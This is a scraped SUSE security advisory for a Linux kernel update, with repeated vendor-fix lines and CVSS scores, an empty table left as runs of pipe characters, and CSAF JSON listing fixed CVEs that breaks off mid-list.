Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.3 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.8 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThe SUSE Linux Enterprise 15 SP7 Azure kernel was updated to fix various security issues\n\nThe following security issues were fixed:\n\n- CVE-2023-54013: interconnect: Fix locking for runpm vs reclaim (bsc#1256280).\n- CVE-2025-39880: libceph: fix invalid accesses to ceph_connection_v1_info (bsc#1250388).\n- CVE-2025-40238: net/mlx5: Fix IPsec cleanup over MPV device (bsc#1254871).\n- CVE-2025-40254: net: openvswitch: remove never-working support for setting nsh fields (bsc#1254852).\n- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).\n- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).\n- CVE-2025-40261: nvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).\n- CVE-2025-40264: be2net: pass wrb_params in case of OS2BMC (bsc#1254835).\n- CVE-2025-40328: smb: client: fix potential UAF in smb2_close_cached_fid() (bsc#1254624).\n- CVE-2025-40350: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ (bsc#1255260).\n- CVE-2025-40355: sysfs: check visibility before changing group attribute ownership (bsc#1255261).\n- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).\n- CVE-2025-68171: x86/fpu: Ensure XFD state on signal delivery (bsc#1255255).\n- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).\n- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).\n- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).\n- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).\n- CVE-2025-68215: ice: fix PTP cleanup on driver removal in error path (bsc#1255226).\n- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).\n- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).\n- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).\n- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255377).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255401).\n- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).\n- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).\n- CVE-2025-68301: net: atlantic: fix fragment overflow handling in RX path (bsc#1255120).\n- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).\n- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).\n- CVE-2025-68327: usb: renesas_usbhs: Fix synchronous external abort on unbind (bsc#1255488).\n- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).\n- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).\n- CVE-2025-68363: bpf: Check skb-\u003etransport_header is set in bpf_skb_check_mtu (bsc#1255552).\n- CVE-2025-68365: fs/ntfs3: Initialize allocated memory before use (bsc#1255548).\n- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).\n- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).\n- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).\n- CVE-2025-68379: RDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure (bsc#1255695).\n- CVE-2025-68727: ntfs3: Fix uninit buffer allocated by __getname() (bsc#1255568).\n- CVE-2025-68728: ntfs3: fix uninit memory after failed mi_read in mi_format_new (bsc#1255539).\n- CVE-2025-68733: smack: fix bug: unprivileged task can create labels (bsc#1255615).\n- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).\n- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).\n- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).\n- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).\n- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).\n- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).\n- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).\n- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).\n- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).\n- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).\n- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).\n- CVE-2025-68803: nfsd: set security label during create operations (bsc#1256770).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).\n- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).\n- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).\n- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).\n- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).\n- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).\n- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).\n- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).\n- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).\n- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).\n- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).\n- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).\n- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).\n- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).\n- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).\n- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).\n- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).\n- CVE-2025-71096: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly (bsc#1256606).\n- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).\n- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).\n- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).\n- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).\n- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).\n- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).\n- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).\n- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).\n- CVE-2025-71137: octeontx2-pf: fix \u0027UBSAN: shift-out-of-bounds error\u0027 (bsc#1256760).\n- 